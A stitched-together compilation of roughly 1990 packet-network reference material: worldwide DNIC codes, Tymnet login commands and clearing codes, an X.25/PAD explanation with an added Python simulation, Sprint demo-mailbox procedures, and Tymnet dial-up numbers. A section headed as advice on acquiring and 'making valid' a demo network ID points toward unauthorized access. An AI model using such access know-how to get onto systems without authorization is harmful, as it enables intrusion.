Also you can access them through any Telenet or Tymnet dial-up number in the USA. For Telenet when you get to the prompt type C and the system NUA e.g. ‘C 301 222’ for system 50. On Tymnet at the ‘PLEASE LOG IN:’ prompt you type in ‘DIALCOM;xx’ where xx is the system number.
For people in New York NY or Washington DC areas they also have their own dial in network.

COUNTRY NETWORK DNIC
——- ——- —-
ANDORRA ANDORPAC 2945
ANTIGUA AGANET 3443
ARGENTINA ARPAC 7220
ARPAC 7222
AUSTRIA DATEX-P 2322
DATEX-P TTX 2323
RA 2329
AUSTRALIA AUSTPAC 5052
OTC DATA ACCESS 5053
AUSTPAC 5054
BAHAMAS BATELCO 3640
BAHRAIN BAHNET 4263
BARBADOS IDAS 3423
BELGIUM DCS 2062
DCS 2068
DCS 2069
BERMUDA BERMUDANET 3503
BRAZIL INTERDATA 7240
RENPAC 7241
RENPAC 7248
RENPAC 7249
CAMEROON CAMPAC 6242
CANADA DATAPAC 3020
GLOBEDAT 3025
INFOGRAM 3028
INFOSWITCH 3029
CAYMAN ISLANDS IDAS 3463
CHAD CHAD 6222
CHANNEL IS PSS 2342
CHILE ENTEL 7302
CHILE-PAC 7303
VTRNET 7305
ENTEL 7300
CHINA PTELCOM 4600
COLOMBIA COLDAPAQ 7322
COSTA RICA RACSAPAC 7120
RACSAPAC 7122
RACSAPAC 7128
RACSAPAC 7129
CURACAO UDTS 3400
CYPRUS CYTAPAC 2802
CYTAPAC 2807
CYTAPAC 2808
CYTAPAC 2809
DENMARK DATAPAK 2382
DATAPAK 2383
DJIBOUTI STIPAC 6382
DOMINICAN REP. UDTS-I 3701
EGYPT ARENTO 6020
FINLAND DATAPAK 2441
DATAPAK 2442
DIGIPAK 2443
FRANCE TRANSPAC 2080
NTI 2081
TRANSPAC 2089
TRANSPAC 9330
TRANSPAC 9331
TRANSPAC 9332
TRANSPAC 9333
TRANSPAC 9334
TRANSPAC 9335
TRANSPAC 9336
TRANSPAC 9337
TRANSPAC 9338
TRANSPAC 9339
FR ANTILLES TRANSPAC 2080
FR GUIANA TRANSPAC 2080
DOMPAC 7420
FR POLYNESIA TOMPAC 5470
GABON GABONPAC 6282
GERMANY F.R. DATEX-P 2624
DATEX-C 2627
GREECE HELPAK 2022
HELLASPAC 2023
GREENLAND KANUPAX 2901
GUADELOUPE DOMPAC 3400
GUAM LSDS-RCA 5350
PACNET 5351
GUATEMALA GUATEL 7040
GUATEL 7043
HONDURAS HONDUTEL 7080
HONDUTEL 7082
HONDUTEL 7089
HONG KONG INTELPAK 4542
DATAPAK 4545
INET HK 4546
HUNGARY DATEX-P 2160
DATEX-P 2161
ICELAND ICEPAK 2740
INDIA GPSS 4042
INDONESIA SKDP 5101
IRELAND EIRPAC 2721
EIRPAC 2724
ISRAEL ISRANET 4251
ITALY DARDO 2222
ITAPAC 2227
IVORY COAST SYTRANPAC 6122
JAMAICA JAMINTEL 3380
JAPAN GLOBALNET 4400
DDX 4401
NIS-NET 4406
VENUS-P 4408
VENUS-P 9955
VENUS-C 4409
KOREA REP DACOM-NET 4501
DNS 4503
KUWAIT BAHNET 4263
LEBANON SODETEL 4155
LUXEMBOURG LUXPAC 2704
LUXPAC 2709
MACAU MACAUPAC 4550
MALAYSIA MAYPAC 5021
MARTINIQUE DOMPAC 3400
MAURITIUS MAURIDATA 6170
MEXICO TELEPAC 3340
MOROCCO MOROCCO 6040
NETHERLANDS DATANET-1 2040
DATANET-1 2041
DABAS 2044
DATANET-1 2049
N. MARIANAS PACNET 5351
NEW CALEDONIA TOMPAC 5460
NEW ZEALAND PACNET 5301
NIGER NIGERPAC 6142
NORWAY DATAPAC TTX 2421
DATAPAK 2422
DATAPAC 2423
PANAMA INTELPAQ 7141
INTELPAQ 7142
PERU DICOTEL 7160
PHILIPPINES CAPWIRE 5150
CAPWIRE 5151
PGC 5152
GMCR 5154
ETPI 5156
PORTUGAL TELEPAC 2680
SABD 2682
PUERTO RICO UDTS 3300
UDTS 3301
QATAR DOHPAC 4271
REUNION (FR) TRANSPAC 2080
DOMPAC 6470
RWANDA RWANDA 6352
SAN MARINO X-NET 2922
SAUDI ARABIA ALWASEED 4201
SENEGAL SENPAC 6081
SINGAPORE TELEPAC 5252
TELEPAC 5258
ITELPAK 4542
SOUTH AFRICA SAPONET 6550
SAPONET 6551
SAPONET 6559
SOUTH KOREA DACOM-NET 4501
SPAIN TIDA 2141
IBERPAC 2145
SWEDEN DATAPAK TTX 2401
DATAPAK-1 2402
DATAPAK-2 2403
TELEPAK 2405
SWITZERLAND TELEPAC 2284
TELEPAC 2289
TAIWAN PACNET 4872
PACNET 4873
UDAS 4877
THAILAND THAIPAC 5200
IDAR 5201
TOGOLESE REP. TOGOPAC 6152
TORTOLA IDAS 3483
TRINIDAD DATANETT 3745
TEXTET 3740
TUNISIA RED25 6050
TURKEY TURPAC 2862
TURPAC 2863
TURKS&CAICOS IDAS 3763
U ARAB EMIRATES EMDAN 4241
EMDAN 4243
TEDAS 4310
URUGUAY URUPAC 7482
URUPAC 7489
USSR IASNET 2502
U.S. VIRGIN I UDTS 3320
U. KINGDOM IPSS-BTI 2341
PSS-BT 2342
MERCURY 2350
MERCURY 2351
HULL 2352
USA AUTONET 3126
COMPUSERVE 3132
FTCC 3124
ITT/UDTS 3103/310
MARKET 3136
RCA/LSDS 3113
TELENET 3110/312
TRT-DTAPAK 3119
TYMNET 3106
UNINET 3125
WUI-DBS 3104
WUTCO 3101
YUGOSLAVIA YUGOPAC 2201
ZIMBABWE ZIMNET 6482
——————————————————————
McDonnell Douglas Information Systems Company
FOR IMMEDIATE RELEASE
89-191
ST. LOUIS, July 31, 1989 — McDonnell Douglas Corporation today announced that it will sell two of its information systems businesses and that it intends to convert its Information Systems International unit into a public company headquartered in the United Kingdom.
McDonnell Douglas has reached a preliminary agreement to sell its Network Systems Business which includes the Tymnet public data network, to British Telecom for $355 million. The acquisition is conditional on a full due diligence and regulatory clearances.
————————-
the commands at the ‘please log in:’ prompt are: (in summary)
^R – flow control the host (e.g. bix) with xon/xoff
^X – allow host to flow control you with xon/xoff
^H – set half duplex (turn local echo on)
^P – set even parity
– ignore the garbage I just typed and give me another ‘please log in:’

The host computer can and usually does reset/set these parameters depending on how the host interface is configured. After the ‘please log in:’ point the user cannot change these settings. If you entered a BS (^H) accidentally causing double echoing and bix doesn’t reset it then your only choice is to hang up and try it again.
The other terminal types are primarily for terminals that require line-feed/carriage return delay.

Terminal Identifiers
——————–
A ASCII 300baud and up CRT’s, PC’s
B ASCII 150baud All terminals
C ASCII 300baud Impact printers
D ASCII 100baud All terminals
E ASCII 300baud Thermal printers ( TI Silent 700)
F ASCII 150 in/300 out BETA terminals
G ASCII 300,1200 Belt printers, G.E. Terminet
I ASCII 1200baud Matrix printers
P EBCD/Correspondence 147.5baud Selectric-type terminals (2741)
————————–

DTE originated means that either the host that you were connected to or the local PAD cleared the call. The message usually tells you which by indicating either “local” or “remote” with the message.

cxx is the reason code for the clear, while dxx is the diagnostic code. If it is a dte originated clear then the reason code will always be the same. CCITT only allows DCEs (the Network) to generate meaningful reason codes.

The functions of an X.25 PAD (Packet Assembler/Disassembler) are to take the data from one protocol (async, SNA, Bisync, etc.) and format it so that it can be placed onto an X.25 network.

The command interface used to configure a port on an Async PAD only by the user is called X.28. The parameters that you would be changing are called X.3 parameters. Before you can use the X.28 commands you need to know the escape character to enable you to talk to the PAD and not the destination. Not all ports have an escape character enabled, for obvious reasons. Once you are talking to the PAD the two main commands that are used in X.28 are PAR and SET.

PAR is used to display the value of the 18-22 X.3 parameters, depending on whether your PAD is 1980 or 1984 compatible. SET is used to change the parameter value. This command is followed by the parameter number, a colon and then the new value.
————————–

TYMNET CLEARING CAUSE AND DIAGNOSTIC CODES
——————————————
Note: All Cause and diagnostic values are specified in decimal.

Cause Diagnostic Explanation
—– ———- —————————————–
00 — DTE originated;
Any Diagnostic is DTE provided.
01 — Number busy;
129 An ‘out of ports’ condition occurred.
03 — Invalid facility request;
65 Call set-up problem, facility code not allowed.
66 Call set-up problem, facility parameter not allowed.
05 — Network congestion;
20 Packet type invalid for state p1 [ready]
21 Packet type invalid for state p2 [STE-X call request]
22 Packet type invalid for state p3 [STE-Y call request]
23 Packet type invalid for state p4 [data transfer]
24 Packet type invalid for state p5 [call collision]
25 Packet type invalid for state p6 [STE-X clear request]
26 Packet type invalid for state p7 [STE-Y clear request]
33 Packet not allowed; unidentifiable packet
38 Packet not allowed; packet too short
39 Packet not allowed; packet too long
41 Logical channel non-zero in restart/restart confirm.
49 Timer expired for incoming call
50 Timer expired for clearing indication
51 Timer expired for reset indication
64 Call set-up problem (incorrect facility/utility field)
67 Call set-up problem, invalid called address
68 Call set-up problem, invalid calling address
128 Internal malfunction
129 The network supervisor sent ‘circuits busy’ message
130 The network supervisor sent ‘try again later’
131 The network supervisor sent ‘bad mud’
133 The network supervisor sent ‘no host specified’
134 The network supervisor sent ‘mud error’
135 Calling address does not match CHKCLG sysgen statement
138 Login error. TKSUP sysgen option not specified
139 The network supervisor sent ‘error, type username’
140 Received clear before getting normal circuit complete
141 Circuit timeout before sending call accept
142 Login timeout
143 INFOSWITCH login timeout
145 Utility length missing
146 Non-CCITT protocol identifier
147 Call user data in call accept without fast select
148 Internal problem; illegal dialect message
150 The Q-bit was set on a non-data packet
151 Call user data field too long
152 Data lost in network
153 Login failure; node unable to complete request
154 Login failure; format error
155 Login failure; bad username
156 Login failure; bad mud
157 Login failure; system unavailable
158 Login failure; downline load or dial-out failure
159 Login failure; timeout
160 Login failure; access not permitted
161 Login failure; out of origination ports
162 Login failure; try again later
163-168 Login failure; unknown reason
169 Non-DSP call to DSP host
170 Invalid dialect level response
171 DSP call to non-DSP host
172 Buffer capacity exceeded
174 Error in received clear request packet
175 Invalid dialect message
176 Unimplemented dialect message
178 DNIC received in RPOA facility matches our DNIC
179 Unknown DNIC specified in RPOA facility
180 Illegal call accept dialect message
181 Illegal national utility/facility in call request
184 Duplicated utility/facility
185 Requested packet size not acceptable in negotiation
186 Requested packet window not acceptable in negotiation
188 Missing call identifier utility in call request
190 Call request received on an assigned logical channel
191 XOM shut
192 No available internal ports
09 — Out of order;
129 The network supervisor sent ‘host shut’ message
130 The network supervisor sent ‘host down’ message
11 — Access barred
129 The network supervisor sent ‘access not permitted’
130 The network supervisor sent ‘please see your rep.’
182 Outgoing calls barred within closed user group
183 Incoming calls barred within closed user group
13 — Not obtainable
129 The network supervisor sent ‘host not available’
130 The network supervisor sent ‘bad host’
17 — Remote procedure error;
17 Packet type invalid for state r1 [packet level ready]
18 Packet type invalid for state r2/r3 [STE-X/Y restart]
33 Packet not allowed; unidentifiable packet
41 Logical channel non-zero in restart/restart confirm.
52 Timer expired for restart indication
33 — Incompatible destination
40 Invalid GFI; D-bit not implemented
41 — Fast select acceptance not subscribed
65 Invalid facility request
————————–
[How does it all work?] Rather larger question. First, packet switches are not identical. They have different internal implementations, different sets of external interfaces and different sets of external protocols. Their implementations of the external protocols may also vary. (Gives you a nice, warm feeling, doesn’t it.) In general, packet networks receive (or generate) packets of data at the edge of the network which they then transport to the desired destination. The facilities (links between packet nodes) of the network are shared among all the users thus sharing the costs of the facilities. The two most popular ways of getting data into a packet network are: async; and X.25.

Async: Characters are received using start/stop delimiting. These characters are gathered into a packet and the packet is forwarded to the destination when it is full, certain characters have been encountered or after a specified delay. This function is called a PAD (Packet Assembler/Disassembler) and is specified in the X.3 and X.29 standards of the CCITT. The packet network normally charges a premium to perform the PAD function since it consumes CPU resources. Async lines support one connection.

X.25: X.25 is a synchronous protocol (ie. the interface must provide both the data and the clock for sampling the data at the appropriate time). Data is gathered into packets by the user and then transmitted to the packet network. X.25 provides a method of multiplexing multiple connections on one physical line (up to 4095, however, most packet networks only support a small subset). (I know, this is the condensed Reader’s Digest version, but a full explanation of X.25 would take too long for me to write.)

The hardware interface that you would see may depend on the speed of interface you require and the distance between you and the packet network. If you are not close to the node (say in the same building), the normal method of connection would be via modems. Some of the “standard” interfaces include RS232 (V.24), V.35 and RS449 (RS422/RS423). RS232 is only specified to 19200 bits/s and 50 feet. Many people push RS232 well beyond its spec. (and have some problems with it. I wouldn’t go beyond 64K bps and only then with VERY short cables, say 1-3 feet). The V.35 spec doesn’t go above 48K bps but with a proper cable I have run 300-500K bps. I have seen T1 (1.544M bps) on V.35, but, you need a well shielded, short cable. The RS-449 spec contains a speed/length graph (which I don’t have at home). I believe that it can be run up to 1M bps over a reasonable distance (say 50 feet).

For what you are doing (Unix BBS), you need to find a match between the external interfaces and protocols supported by your Unix box and the packet network. What kind of bandwidth are you looking for (per connection and over all)? What hardware interfaces does your box support? Does your box support X.25 or just async?

As an example, I have a Sun 3/60 at my desk with a 19.2K bps X.25 connection to a packet network. I run an X.29 PAD on the Sun. It can support a total of about 50-60 connections (a Unix socket limitation with BSD 4.03). The line has both incoming and outgoing call capabilities. On incoming calls, I can provide different actions based on the calling address, called address and protocol id bytes of the call. I can provide a Unix login prompt if I desire or I can drop the user directly into an application (eg. a BBS).
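The three async forwarding conditions described above (packet full, a designated character seen, a delay expired), driven by the X.28 SET syntax from the earlier PAD note, as an added example that is not part of the original text. The X.3 parameter numbers used here, 3 (data-forwarding character, where value 2 selects carriage return) and 4 (idle timer in twentieths of a second), come from the CCITT X.3 recommendation rather than from this page; the `Pad` class, the 8-byte packet size and the sample input are constructed for illustration.

```python
from dataclasses import dataclass, field

CR = 0x0D
FORWARD_ON_CR = 2   # X.3 parameter 3: bit value 2 selects carriage return


@dataclass
class Pad:
    """Assembly side of an async PAD for one terminal line (illustrative model).

    Time is an integer count of 1/20 s ticks, the unit X.3 parameter 4 uses.
    """
    packet_size: int = 128                     # assumption: a common X.25 default
    params: dict = field(default_factory=lambda: {3: FORWARD_ON_CR, 4: 0})
    buf: bytearray = field(default_factory=bytearray)
    last_rx: int = 0
    sent: list = field(default_factory=list)   # one (reason, payload) per packet

    def set_command(self, line):
        """Apply 'SET n:v[,n:v...]'; a malformed item leaves every value unchanged."""
        verb, _, rest = line.strip().partition(" ")
        if verb.upper() != "SET" or not rest.strip():
            raise ValueError("expected SET <param>:<value>[,<param>:<value>...]")
        updates = {}
        for item in rest.split(","):
            ref, sep, val = (part.strip() for part in item.partition(":"))
            if not sep or not ref.isdecimal() or not val.isdecimal():
                raise ValueError(f"malformed item {item!r}")
            if not 0 <= int(val) <= 255:
                raise ValueError(f"value out of range in {item!r}")
            updates[int(ref)] = int(val)
        self.params.update(updates)            # applied only if every item parsed

    def _forward(self, reason):
        """Hand the buffered characters to the network as one packet."""
        if self.buf:
            self.sent.append((reason, bytes(self.buf)))
            self.buf.clear()

    def tick(self, now):
        """Forward a partial packet once the line has been idle for parameter 4 ticks."""
        delay = self.params.get(4, 0)          # 0 disables the idle timer
        if delay and self.buf and now - self.last_rx >= delay:
            self._forward("idle")

    def receive(self, ch, now):
        """Accept one character from the terminal at time `now`."""
        self.tick(now)
        self.buf.append(ch)
        self.last_rx = now
        if ch == CR and self.params.get(3, 0) & FORWARD_ON_CR:
            self._forward("forward-char")
        elif len(self.buf) >= self.packet_size:
            self._forward("full")


def demo():
    """Constructed input: a short line, a burst longer than a packet, then silence."""
    pad = Pad(packet_size=8)
    pad.set_command("SET 3:2,4:10")            # forward on CR; idle timer 10/20 s
    now = 0
    for ch in b"hello\r" + b"0123456789":
        pad.receive(ch, now)
        now += 1                               # one character per tick
    pad.tick(now + 10)                         # terminal goes quiet
    return pad.sent


if __name__ == "__main__":
    for reason, payload in demo():
        print(f"{reason:13} {payload!r}")
```

With parameter 3 set to 0 and the idle timer off, the same input is held until a full packet accumulates, which is why a misconfigured PAD port appears to swallow short lines.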

——————————————-
Info on acquiring and using a demo nui
and making one valid.
——————————————
200000 UN:USA.DEMO)
BELGIUM (C:BELGIUM,PUB:RTT,O:ASSOCIATES, 02062223344 UN:DEMO.X400)
CANADA (C:CANADA,PUB:TELECOM.CANADA, 0302089400900 O:TELECOM.SPE, ID:SALES.DEMO)
CHILE (C:CHILE,PUB:TOMMAIL,O:CORRESPONSALES, 0730520000450 UN:TELENET)
HONG KONG (C:HONGKONG, PUB:INET.HK, 0454610100500 O:TELENET.HONGKONG, UN:SALES.DEMO)
ITALY (C:ITALY,PUB:MASTER4OOT,O:TELEO, 022222600331 UN:BBERNSTEIN)
JAPAN (C:JAPAN,PUB:ATI,O:DEMO,UN:SALES.REPS) 0440020098810
MALAYSIA (C:MALAYSIA, PUB:STM.TELEMAIL, O:STM, 0502113205290 UN:SALES.DEMO)
MEXICO NOT AVAILABLE AT THIS TIME
NORWAY NOT AVAILABLE AT THIS TIME
SWEDEN (C:SWEDEN,PUB:TBXSPA,O:EXTERNAL, 02402001325 UN:SWEDEMAIL)
TAIWAN (C:ROC,PUB:PIPMAIL,O:PIP,UN:TELEMAIL) 0487220250
U.A.E. NOT AVAILABLE AT THIS TIME
UK (C:GB,PUB:TMAILUK,O:CCI,UN:TM.DEMO) 0234212300187
——————————————————–

DEMO PROCEDURES

Compose a message in your mailbox on the SprintMail USA system and in the “TO:” field of the envelope enter the appropriate “INT’L DEMO MAILBOX X.400 ADDRESS” listed above, including the parentheses. When complete, type “Y” at the “Send?” prompt. If desired, you can use the delivery receipt feature (DEL) to receive a confirmation-of-delivery message back to your mailbox. An example of the “TO:” field of the envelope for a message sent to SprintMail Ltd. UK is shown below:

TO: (C:GB,PUB:TMAILUK,O:CCI,UN:TM.DEMO) (DEL)
Once you have typed “Y” followed by a carriage return, the message will be sent to the demo mailbox on the overseas messaging system via the international interconnection.

To retrieve the message and verify delivery for the customer, you will need to connect to the overseas messaging system via SprintNet and directly access the demo mailbox. To do this, first type “BYE” to disconnect from SprintMail. You will then receive the SprintNet ” prompt on your PC/terminal. After SprintNet gives an ” prompt you will need to enter your SprintNet NUI (ID/Password account).
Type “ID”, skip a space, and then enter your PDN ID code followed by a carriage return. Next the SprintNet will prompt you for “PASSWORD=”. Enter your password followed by a carriage return.

NOTE: IF YOU DO NOT ALREADY HAVE A U.S. SPRINT NUI FOR DEMO PURPOSES, PLEASE COMPLETE A U.S. SPRINT “USER ID ORDER FORM” AND MAIL IT TO:
Order Entry Department
U.S. Sprint Communication Corporation
12490 Sunrise Valley Drive
Reston, VA 22096
MAIL SLOT OP212B

The top of the form should be filled out as follows:
Customer Name = US Sprint
Master Agreement No. = (LEAVE BLANK)
Customer Number = (LEAVE BLANK)
Sales Office Log No. = (LEAVE BLANK)
Customer Admin. = Office Administrator
Admin. Phone No. = Office Phone Number

———————————————————–
Fill in the body of the form as necessary and put “For Internal US Sprint Use” in the comments section. The form must be signed by your branch manager for approval.
After you have correctly entered your NUI(ID/Password), the SprintNet will again prompt you with an “. At this point, type “C”, skip a space, and then enter the “OVERSEAS MESSAGING SYSTEM NETWORK ADDRESS” provided above followed by a carriage return. For example, to connect to the SprintMail messaging host in UK you would type the following at the SprintNet ” prompt:
C 0234212300187
Please note that all the international network X.121 addresses shown on the list above ALREADY have been preceded by a 0 (zero), which is the SprintNet terminal handler for formatting the X.121 address.
SprintNet will respond with a “CONNECTED” notice, after which you will receive the “User name?” prompt from the overseas messaging system. Enter the appropriate user name from the table above, followed by a carriage return. The name after “UN:” is the user name. In the case of the UK, the user name would be “TM.DEMO”. Next you will be prompted for “Password?”. Enter the correct demo mailbox password followed by a carriage return.
NOTE: TO OBTAIN THE APPROPRIATE PASSWORD FOR A DEMO MAILBOX, PLEASE SEND A REQUEST ON SPRINTMAIL TO SALES.SUPPORT. PASSWORDS WILL BE PROVIDED ONLY ON AN AS NEEDED BASIS. IN YOUR MESSAGE,PLEASE INDICATE THE NAME OF THE CUSTOMER THE DEMO IS FOR AND THE DESIRED DEMO DATE.
You are now using the demo mailbox on the overseas messaging system. The Scan table will show the message you previously sent from the SprintMail USA system. Use the READ command to show the customer the contents of the message and verify delivery.
If you wish to demo the service in the reverse direction, type “Compose” at the “Command?” prompt and address a message to your mailbox or the customer’s mailbox. In the “TO:” field of the envelope you must follow the X.400 addressing format, as follows:
TO: (C:USA,PUB:SPRINTMAIL,O:XXXXXXX,UN:YYYYYY)

where XXXXXXX is the Organization name
and YYYYYYY is the User name
At the “Command?” prompt type “BYE” followed by a carriage return to disconnect from the overseas messaging system.

———————————————————-

*[TYMNET]*
TYMNET ACCESS SORTED BY NODE NUMBER 10/17/1990

NODE CITY STATE DEN ACCESS NUMBER
—– —————– ————– —- ————-
00000 ANCHORAGE ALASKA INTL 907/258-7222
00000 # ANCHORAGE ALASKA INTL 907/258-6607
00000 BARROW ALASKA INTL 907/852-2425
00000 BETHEL ALASKA INTL 907/543-2411
00000 COLD BAY ALASKA INTL 907/532-2371
00000 CORDOVA ALASKA INTL 907/424-3744
00000 DEAD HORSE ALASKA INTL 907/659-2777
00000 DELTA JUNCTION ALASKA INTL 907/895-5070
00000 DILLINGHAM ALASKA INTL 907/842-2688
00000 FAIRBANKS ALASKA INTL 907/456-3282
00000 # FAIRBANKS ALASKA INTL 907/452-5848
00000 GLENNALLEN ALASKA INTL 907/822-5231
00000 HAINES ALASKA INTL 907/766-2171
00000 HOMER ALASKA INTL 907/235-5239
00000 ILIAMNA ALASKA INTL 907/571-1364
00000 JUNEAU ALASKA INTL 907/789-7009
00000 # JUNEAU ALASKA INTL 907/789-1976
00000 KENAI ALASKA INTL 907/262-1990
00000 KETCHIKAN ALASKA INTL 907/225-1871
00000 KING SALMON ALASKA INTL 907/246-3049
00000 KODIAK ALASKA INTL 907/486-4061
00000 KOTZEBUE ALASKA INTL 907/442-2602
00000 MCGRATH ALASKA INTL 907/524-3256
00000 MENANA ALASKA INTL 907/832-5214
00000 NOME ALASKA INTL 907/443-2256
00000 NORTHWAY ALASKA INTL 907/778-2301
00000 PALMER/WASILLA ALASKA INTL 907/745-0200
00000 PETERSBURG ALASKA INTL 907/772-3878
00000 PRUDHOE BAY ALASKA INTL 907/659-2777
00000 SEWARD ALASKA INTL 907/224-3126
00000 SITKA ALASKA INTL 907/747-5887
00000 SKAGWAY ALASKA INTL 907/983-2170
00000 SOLDOTNA/KENAI ALASKA INTL 907/262-1990
00000 ST. PAUL ALASKA INTL 907/546-2320
00000 TALKEETNA ALASKA INTL 907/733-2227
00000 TANANA ALASKA INTL 907/366-7167
00000 TOK ALASKA INTL 907/883-4747
00000 VALDEZ ALASKA INTL 907/835-4987
00000 WASILLA ALASKA INTL 907/745-0200
00000 WHITTIER ALASKA INTL 907/472-2467
00000 WRANGELL ALASKA INTL 907/874-2394
00000 YAKUTAT ALASKA INTL 907/784-3453
02026 # MARSHALLTOWN IOWA LOW 515/753-0670
02035 #ALEXANDRIA/FAIRFAX VIRGINIA HIGH 703/352-3136
02035 # ARLINGTON/FAIRFAX VIRGINIA HIGH 703/352-3136
02035 # BETHESDA MARYLAND HIGH 703/352-3136
02035 # FAIRFAX VIRGINIA HIGH 703/352-3136
02035 # WASHINGTON D.C. HIGH 703/352-3136
02045 # ALBANY NEW YORK MED 518/458-9724
02045 #SCHENECTADY/ALBANY NEW YORK MED 518/458-9724
02050 # CASPER WYOMING LOW 307/234-4211
02057 # SEVIERVILLE TENNESSEE LOW 615/453-0401
02066 INDIANAPOLIS INDIANA HIGH 317/631-1002
02071 # LAS CRUCES NEW MEXICO LOW 505/525-3401
02074 # INDIANAPOLIS INDIANA HIGH 317/632-6408
02124 # YAKIMA WASHINGTON LOW 509/248-1462
02145 + NORRISTOWN PENNSYLVANIA HIGH 215/668-1984
02155 # BLOOMINGTON INDIANA LOW 812/332-0544
02163 # CHEYENNE WYOMING LOW 307/638-0403
02244 # DOWNRS GROV ILLINOIS MED 708/790-4955
02244 # GLEN ELLYN ILLINOIS MED 708/790-4955
02244 # WHEATON/GLN ELLYN ILLINOIS MED 708/790-4955
02246 BIRMINGHAM ALABAMA HIGH 205/942-4141
02252 # VINELAND NEW JERSEY LOW 609/691-6446
02256 ELGIN ILLINOIS LOW 708/888-8113
02263 # LAWTON OKLAHOMA LOW 405/353-6987
02265 # ALBUQUERQUE NEW MEXICO MED 505/242-8931
02301 # EAU CLAIRE WISCONSIN LOW 715/833-0121
02304 NEW YORK NEW YORK HIGH 212/269-4640
02323 # ST. CLOUD MINNESOTA LOW 612/251-4942
02326 # ORMOND BEACH FLORIDA LOW 904/673-0034
02346 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
02354 BALTIMORE MARYLAND HIGH 301/547-8100
02357 BLOOMFIELD CONNECTICUT HIGH 203/242-7140
02357 HARTFORD/BLMFIELD CONNECTICUT HIGH 203/242-7140
02364 MESA/PHOENIX ARIZONA HIGH 602/254-5811
02364 PHOENIX ARIZONA HIGH 602/254-5811
02367 # CHAMPAIGN/URBANA ILLINOIS LOW 217/344-3400 02367 # URBANA ILLINOIS LOW 217/344-3400
02376 # LIMA OHIO LOW 419/228-6343
02377 MINNEAPOLIS MINNESOTA HIGH 612/338-0845
02377 ST. PAUL/MINN MINNESOTA HIGH 612/338-0845
02402 # HATTIESBURG MISSISSIPPI LOW 601/582-0286 02414 AURORA/DENVER COLORADO HIGH 303/830-9210
02414 BOULDER/DENVER COLORADO HIGH 303/830-9210
02414 DENVER COLORADO HIGH 303/830-9210
02425 # MESA/PHOENIX ARIZONA HIGH 602/258-0554
02425 # PHOENIX ARIZONA HIGH 602/258-0554
02432 # CHATTANOOGA TENNESSEE MED 615/265-1020 02435 # WILLIAMSBURG VIRGINIA LOW 804/229-6786
02440 BROOKFIELD WISCONSIN HIGH 414/785-1614
02440 MIL/BROOKFIELD WISCONSIN HIGH 414/785-1614
02443 # BURBANK CALIFORNIA LOW 818/841-4795
02443 # GLENDALE/BURBANK CALIFORNIA LOW 818/841-4795
02446 # TEXARKANA TEXAS LOW 214/792-4521
02450 #KING-PRUSA/NORSTWN PENNSYLVANIA MED 215/666-9190 02450 # NORRISTOWN PENNSYLVANIA MED 215/666-9190 02450 # VLY FORGE/NORSTWN PENNSYLVANIA MED 215/666-9190
02453 DALLAS TEXAS HIGH 214/638-8888
02465 DWNRS GRV/GLN ELN ILLINOIS MED 708/790-4400
02465 GLEN ELLYN ILLINOIS MED 708/790-4400
02465 WHTON/GLEN ELLYN ILLINOIS MED 708/790-4400
02502 # LAWRENCE MASSACHUSETTS LOW 508/683-2680
02503 BELLEVUE/SEATTLE WASHINGTON HIGH 206/285-0109
02503 SEATTLE WASHINGTON HIGH 206/285-0109
02521 + JACKSONVILLE FLORIDA MED 904/724-5994
02544 ALXANDRIA/FAIRFAX VIRGINIA HIGH 703/691-8200
02544 ARLINGTON/FAIRFAX VIRGINIA HIGH 703/691-8200
02544 BETHESDA MARYLAND HIGH 703/691-8200
02544 FAIRFAX VIRGINIA HIGH 703/691-8200
02544 WASHINGTON D.C. HIGH 703/691-8200
02545 ALXANDRIA/FAIRFAX VIRGINIA HIGH 703/691-8200
02545 ARLINGTON/FAIRFAX VIRGINIA HIGH 703/691-8200
02545 BETHESDA MARYLAND HIGH 703/691-8200
02545 FAIRFAX VIRGINIA HIGH 703/691-8200
02545 WASHINGTON D.C. HIGH 703/691-8200
02555 # MYRTLE BEACH SOUTH CAROLINA LOW 803/448-5401
02557 # TYLER TEXAS LOW 214/581-8652
02564 # RICHLAND WASHINGTON MED 509/375-3367
02565 BOISE IDAHO MED 208/343-0404
02566 # PIERRE SOUTH DAKOTA LOW 605/224-7700
02570 DAYTON OHIO MED 513/898-0124
02606 ELIZABETH/NEWARK NEW JERSEY HIGH 201/824-1212
02606 JERSEY CITY/NWK NEW JERSEY HIGH 201/824-1212
02606 NEWARK NEW JERSEY HIGH 201/824-1212
02606 UNION/NEWARK NEW JERSEY HIGH 201/824-1212
02613 CHAPEL HILL/DURHAM NORTH CAROLINA MED 919/549-8952
02613 DURHAM NORTH CAROLINA MED 919/549-8952
02614 # LANCASTER CALIFORNIA LOW 805/945-4962
02616 # MANCHESTER MASSACHUSETTS LOW 508/526-1506
02630 # SHERMAN TEXAS LOW 214/868-0089 0631 NEWPRT BEACH CALIFORNIA HIGH 714/756-8341
02631 IRVINE/NEWPORT CALIFORNIA HIGH 714/756-8341
02631 NEWPORT BEACH CALIFORNIA HIGH 714/756-8341
02631 SANTA ANA/NEWPRT CALIFORNIA HIGH 714/756-8341
02640 # PETERBOROUGH NEW HAMPSHIRE LOW 603/924-7090 02644 ANAHEIM/NEWPRT CALIFORNIA HIGH 714/752-1493
02644 IRVINE/NEWPORT CALIFORNIA HIGH 714/752-1493
02644 NEWPORT BEACH CALIFORNIA HIGH 714/752-1493
02644 SANTA ANA/NEWPRT CALIFORNIA HIGH 714/752-1493
02653 STAMFORD CONNECTICUT HIGH 203/965-0000
02655 COLTON/RIVERSIDE CALIFORNIA MED 714/370-1200
02655 RIVERSIDE CALIFORNIA MED 714/370-1200
02655 SAN BERN/RIVRSD CALIFORNIA MED 714/370-1200
02665 # SAN DIEGO CALIFORNIA HIGH 619/296-8747
02666 # JACKSON MICHIGAN LOW 517/788-9191
02674 # TUPELO MISSISSIPPI LOW 601/841-0090
02703 # BELLEVUE/SEATTLE WASHINGTON HIGH 206/281-7141
02703 # SEATTLE WASHINGTON HIGH 206/281-7141
02704 # SAN FRANCISCO CALIFORNIA WATS 800/###-####
02706 # MIDLAND TEXAS LOW 915/683-5645 02706 # ODESSA/MIDLAND TEXAS LOW 915/683-5645
02711 # KINGSPORT TENNESSEE LOW 615/378-5746 02720 # LA CROSSE WISCONSIN LOW 608/784-9099
02723 BATON ROUGE LOUISIANA MED 504/924-5102
02735 # SAN ANTONIO TEXAS HIGH 512/222-9877 02737 SALT LAKE UTAH HIGH 801/364-0780
02744 # ELIZABETH/NEWARK NEW JERSEY HIGH 201/824-3044
02744 # JERSEY CITY/NWK NEW JERSEY HIGH 201/824-3044
02744 # NEWARK NEW JERSEY HIGH 201/824-3044
